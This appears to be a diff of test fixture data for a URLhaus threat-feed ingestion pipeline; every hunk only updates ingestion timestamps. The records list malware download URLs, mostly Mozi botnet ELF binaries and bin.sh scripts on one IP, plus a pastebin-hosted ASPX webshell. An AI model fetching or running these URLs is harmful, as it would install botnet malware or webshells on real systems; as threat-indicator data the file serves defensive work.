+25572,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028369400Z", + "ingested": "2021-12-14T14:56:15.726617340Z", "original": "{\"id\":\"961021\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961021/\",\"url\":\"http://89.160.20.156:53595/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -25621,7 +25621,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028376700Z", + "ingested": "2021-12-14T14:56:15.726617789Z", "original": "{\"id\":\"961018\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961018/\",\"url\":\"http://89.160.20.156:57279/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25670,7 +25670,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028383700Z", + "ingested": "2021-12-14T14:56:15.726618159Z", "original": "{\"id\":\"961019\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961019/\",\"url\":\"http://89.160.20.156:49019/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25719,7 +25719,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028390300Z", + "ingested": "2021-12-14T14:56:15.726618529Z", "original": "{\"id\":\"961020\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961020/\",\"url\":\"http://89.160.20.156:48558/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -25768,7 +25768,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028395Z", + "ingested": "2021-12-14T14:56:15.726618912Z", "original": "{\"id\":\"961017\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961017/\",\"url\":\"http://89.160.20.156:58913/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25817,7 +25817,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028399900Z", + "ingested": "2021-12-14T14:56:15.726619377Z", "original": "{\"id\":\"961016\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961016/\",\"url\":\"http://89.160.20.156:49608/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25867,7 +25867,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028407100Z", + "ingested": "2021-12-14T14:56:15.726619751Z", "original": "{\"id\":\"961013\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961013/\",\"url\":\"http://89.160.20.156:41143/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", 
@@ -25916,7 +25916,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028414Z", + "ingested": "2021-12-14T14:56:15.726620123Z", "original": "{\"id\":\"961014\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961014/\",\"url\":\"http://89.160.20.156:42129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25965,7 +25965,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028420900Z", + "ingested": "2021-12-14T14:56:15.726620521Z", "original": "{\"id\":\"961015\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961015/\",\"url\":\"http://89.160.20.156:47403/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26014,7 +26014,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028427900Z", + "ingested": "2021-12-14T14:56:15.726620890Z", "original": "{\"id\":\"961011\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961011/\",\"url\":\"http://89.160.20.156:60187/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -26063,7 +26063,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028434800Z", + "ingested": "2021-12-14T14:56:15.726621654Z", "original": "{\"id\":\"961012\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961012/\",\"url\":\"http://89.160.20.156:46097/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26112,7 +26112,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028441700Z", + "ingested": "2021-12-14T14:56:15.726622142Z", "original": "{\"id\":\"961010\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961010/\",\"url\":\"http://89.160.20.156:50771/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:31:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -26158,7 +26158,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028448600Z", + "ingested": "2021-12-14T14:56:15.726622511Z", "original": "{\"id\":\"961009\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961009/\",\"url\":\"https://pastebin.com/raw/00aUJCLx\",\"url_status\":\"offline\",\"host\":\"pastebin.com\",\"date_added\":\"2021-01-14 16:29:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"pmelson\",\"larted\":\"false\",\"tags\":[\"ASPXShell\",\"webshell\"]}", "category": "threat", "type": "indicator", 
@@ -26208,7 +26208,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028455600Z", + "ingested": "2021-12-14T14:56:15.726622879Z", "original": "{\"id\":\"961008\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961008/\",\"url\":\"http://89.160.20.156:45117/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:25:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -26257,7 +26257,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028462600Z", + "ingested": "2021-12-14T14:56:15.726623374Z", "original": "{\"id\":\"961007\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961007/\",\"url\":\"http://89.160.20.156:41485/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26306,7 +26306,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028470100Z", + "ingested": "2021-12-14T14:56:15.726623784Z", "original": "{\"id\":\"961006\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961006/\",\"url\":\"http://89.160.20.156:43851/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -26355,7 +26355,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028477500Z", + "ingested": "2021-12-14T14:56:15.726624156Z", "original": "{\"id\":\"961005\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961005/\",\"url\":\"http://89.160.20.156:37095/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26404,7 +26404,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028484500Z", + "ingested": "2021-12-14T14:56:15.726624519Z", "original": "{\"id\":\"961004\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961004/\",\"url\":\"http://89.160.20.156:59275/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26453,7 +26453,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028491400Z", + "ingested": "2021-12-14T14:56:15.726624902Z", "original": "{\"id\":\"961002\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961002/\",\"url\":\"http://89.160.20.156:46131/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -26502,7 +26502,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028498300Z", + "ingested": "2021-12-14T14:56:15.726625361Z", "original": "{\"id\":\"961003\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961003/\",\"url\":\"http://89.160.20.156:40129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26551,7 +26551,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028505200Z", + "ingested": "2021-12-14T14:56:15.726625730Z", "original": "{\"id\":\"961000\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961000/\",\"url\":\"http://89.160.20.156:43924/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26600,7 +26600,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028512200Z", + "ingested": "2021-12-14T14:56:15.726626099Z", "original": "{\"id\":\"961001\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961001/\",\"url\":\"http://89.160.20.156:38851/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
@@ -26649,7 +26649,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028519100Z", + "ingested": "2021-12-14T14:56:15.726626470Z", "original": "{\"id\":\"960996\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960996/\",\"url\":\"http://89.160.20.156:33008/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26698,7 +26698,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028526500Z", + "ingested": "2021-12-14T14:56:15.726627263Z", "original": "{\"id\":\"960997\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960997/\",\"url\":\"http://89.160.20.156:60201/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26747,7 +26747,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028533600Z", + "ingested": "2021-12-14T14:56:15.726627647Z", "original": "{\"id\":\"960998\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960998/\",\"url\":\"http://89.160.20.156:41479/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -26796,7 +26796,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028541300Z", + "ingested": "2021-12-14T14:56:15.726628071Z", "original": "{\"id\":\"960999\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960999/\",\"url\":\"http://89.160.20.156:52003/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26845,7 +26845,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028548900Z", + "ingested": "2021-12-14T14:56:15.726628515Z", "original": "{\"id\":\"960995\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960995/\",\"url\":\"http://89.160.20.156:39500/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26894,7 +26894,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028657800Z", + "ingested": "2021-12-14T14:56:15.726628904Z", "original": "{\"id\":\"960994\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960994/\",\"url\":\"http://89.160.20.156:36966/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -26943,7 +26943,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028664600Z", + "ingested": "2021-12-14T14:56:15.726629265Z", "original": "{\"id\":\"960991\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960991/\",\"url\":\"http://89.160.20.156:59875/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26992,7 +26992,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028671900Z", + "ingested": "2021-12-14T14:56:15.726629739Z", "original": "{\"id\":\"960992\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960992/\",\"url\":\"http://89.160.20.156:44123/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27041,7 +27041,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028678400Z", + "ingested": "2021-12-14T14:56:15.726630113Z", "original": "{\"id\":\"960993\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960993/\",\"url\":\"http://89.160.20.156:45224/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -27090,7 +27090,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028682900Z", + "ingested": "2021-12-14T14:56:15.726630480Z", "original": "{\"id\":\"960990\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960990/\",\"url\":\"http://89.160.20.156:43105/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27139,7 +27139,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028688300Z", + "ingested": "2021-12-14T14:56:15.726630841Z", "original": "{\"id\":\"960984\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960984/\",\"url\":\"http://89.160.20.156:46011/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27188,7 +27188,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028697900Z", + "ingested": "2021-12-14T14:56:15.726631260Z", "original": "{\"id\":\"960985\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960985/\",\"url\":\"http://89.160.20.156:51170/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -27237,7 +27237,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028704800Z", + "ingested": "2021-12-14T14:56:15.726631667Z", "original": "{\"id\":\"960986\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960986/\",\"url\":\"http://89.160.20.156:38025/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27286,7 +27286,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028711600Z", + "ingested": "2021-12-14T14:56:15.726632037Z", "original": "{\"id\":\"960987\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960987/\",\"url\":\"http://89.160.20.156:54132/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27335,7 +27335,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028718400Z", + "ingested": "2021-12-14T14:56:15.726632408Z", "original": "{\"id\":\"960988\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960988/\",\"url\":\"http://89.160.20.156:57705/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -27384,7 +27384,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028741700Z", + "ingested": "2021-12-14T14:56:15.726632774Z", "original": "{\"id\":\"960989\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960989/\",\"url\":\"http://89.160.20.156:32983/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27433,7 +27433,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028748400Z", + "ingested": "2021-12-14T14:56:15.726633295Z", "original": "{\"id\":\"960983\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960983/\",\"url\":\"http://89.160.20.156:47908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27482,7 +27482,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028755100Z", + "ingested": "2021-12-14T14:56:15.726633655Z", "original": "{\"id\":\"960982\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960982/\",\"url\":\"http://89.160.20.156:35116/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -27531,7 +27531,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028761800Z", + "ingested": "2021-12-14T14:56:15.726634028Z", "original": "{\"id\":\"960978\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960978/\",\"url\":\"http://89.160.20.156:38070/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27580,7 +27580,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028768500Z", + "ingested": "2021-12-14T14:56:15.726634387Z", "original": "{\"id\":\"960979\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960979/\",\"url\":\"http://89.160.20.156:53399/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27629,7 +27629,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028775Z", + "ingested": "2021-12-14T14:56:15.726634801Z", "original": "{\"id\":\"960980\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960980/\",\"url\":\"http://89.160.20.156:39529/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
